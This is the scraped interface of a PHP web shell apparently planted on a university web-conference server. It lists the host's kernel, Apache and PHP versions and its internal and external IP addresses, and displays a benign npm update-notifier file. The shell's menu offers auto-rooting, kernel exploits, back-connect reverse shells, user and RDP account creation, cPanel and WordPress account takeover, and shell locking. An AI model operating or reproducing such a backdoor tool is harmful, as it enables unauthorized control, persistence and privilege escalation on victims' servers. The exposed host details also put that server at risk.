Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.36.12
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
update-notifier /
[ HOME SHELL ]
Name
Size
Permission
Action
check.js
659
B
-rw-r--r--
index.js
4.51
KB
-rw-r--r--
package.json
2.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check.js
/* eslint-disable unicorn/no-process-exit */ 'use strict'; let updateNotifier = require('.'); const options = JSON.parse(process.argv[2]); updateNotifier = new updateNotifier.UpdateNotifier(options); updateNotifier.checkNpm().then(update => { // Only update the last update check time on success updateNotifier.config.set('lastUpdateCheck', Date.now()); if (update.type && update.type !== 'latest') { updateNotifier.config.set('update', update); } // Call process exit explicitly to terminate the child process // Otherwise the child process will run forever, according to the Node.js docs process.exit(); }).catch(() => { process.exit(1); });
Close